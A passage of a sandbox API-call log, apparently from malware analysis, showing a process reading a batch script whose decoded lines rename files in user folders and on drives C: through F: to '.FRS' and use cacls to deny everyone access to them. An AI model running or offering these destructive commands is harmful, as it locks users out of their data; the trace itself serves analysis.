lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0078.540] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0078.540] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0078.540] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.540] GetFileType (hFile=0x158) returned 0x1 [0078.540] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0078.540] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.540] SetFilePointer (in: hFile=0x158, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0078.540] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0078.540] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0078.540] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.540] GetFileType (hFile=0x158) returned 0x1 [0078.540] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0078.540] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.540] SetFilePointer (in: hFile=0x158, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0078.540] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0078.540] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0078.540] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.540] GetFileType (hFile=0x158) returned 0x1 [0078.540] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0078.540] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.540] SetFilePointer (in: hFile=0x158, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0078.540] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0078.540] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0078.540] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.540] GetFileType (hFile=0x158) returned 0x1 [0078.540] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0078.540] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.540] SetFilePointer (in: hFile=0x158, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0078.540] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0078.541] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0078.541] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.541] GetFileType (hFile=0x158) returned 0x1 [0078.541] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0078.541] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.541] SetFilePointer (in: hFile=0x158, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0078.541] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0078.541] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0078.541] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.541] GetFileType (hFile=0x158) returned 0x1 [0078.541] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0078.541] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.541] SetFilePointer (in: hFile=0x158, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0078.541] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0078.541] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0078.541] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.541] GetFileType (hFile=0x158) returned 0x1 [0078.541] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0078.541] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.541] SetFilePointer (in: hFile=0x158, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0078.541] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0078.541] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0078.541] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.541] GetFileType (hFile=0x158) returned 0x1 [0078.541] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0078.541] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.541] SetFilePointer (in: hFile=0x158, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0078.541] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0078.541] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0078.541] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.542] GetFileType (hFile=0x158) returned 0x1 [0078.542] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0078.542] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.542] SetFilePointer (in: hFile=0x158, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0078.542] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0078.542] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0078.542] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.542] GetFileType (hFile=0x158) returned 0x1 [0078.542] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0078.542] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.542] SetFilePointer (in: hFile=0x158, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0078.542] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0078.542] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0078.542] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.542] GetFileType (hFile=0x158) returned 0x1 [0078.542] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0078.542] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.542] SetFilePointer (in: hFile=0x158, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0078.542] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0078.542] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0078.542] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.542] GetFileType (hFile=0x158) returned 0x1 [0078.542] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0078.542] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.542] SetFilePointer (in: hFile=0x158, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0078.542] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0078.542] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0078.542] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.542] GetFileType (hFile=0x158) returned 0x1 [0078.542] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0078.543] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.543] SetFilePointer (in: hFile=0x158, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0078.543] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0078.543] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0078.543] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.543] GetFileType (hFile=0x158) returned 0x1 [0078.543] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0078.543] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.543] SetFilePointer (in: hFile=0x158, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0078.543] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0078.543] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0078.543] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.543] GetFileType (hFile=0x158) returned 0x1 [0078.543] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0078.543] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.543] SetFilePointer (in: hFile=0x158, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0078.543] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0078.543] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0078.543] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.543] GetFileType (hFile=0x158) returned 0x1 [0078.543] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0078.543] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.543] SetFilePointer (in: hFile=0x158, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0078.543] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0078.543] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0078.543] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.543] GetFileType (hFile=0x158) returned 0x1 [0078.543] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0078.543] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.543] SetFilePointer (in: hFile=0x158, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0078.543] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0078.544] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0078.544] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.544] GetFileType (hFile=0x158) returned 0x1 [0078.544] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0078.544] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.544] SetFilePointer (in: hFile=0x158, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0078.544] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0078.544] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0078.544] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.544] GetFileType (hFile=0x158) returned 0x1 [0078.544] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0078.544] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.544] SetFilePointer (in: hFile=0x158, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0078.544] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0078.544] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0078.544] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.544] GetFileType (hFile=0x158) returned 0x1 [0078.544] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0078.544] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.544] SetFilePointer (in: hFile=0x158, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0078.544] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0078.544] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0078.544] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.544] GetFileType (hFile=0x158) returned 0x1 [0078.544] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0078.544] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.544] SetFilePointer (in: hFile=0x158, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0078.544] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0078.544] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0078.544] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.545] GetFileType (hFile=0x158) returned 0x1 [0078.545] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0078.545] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.545] SetFilePointer (in: hFile=0x158, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0078.545] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0078.545] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0078.545] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.545] GetFileType (hFile=0x158) returned 0x1 [0078.545] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0078.545] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.545] SetFilePointer (in: hFile=0x158, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0078.545] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0078.545] SetFilePointer (in: hFile=0x158, 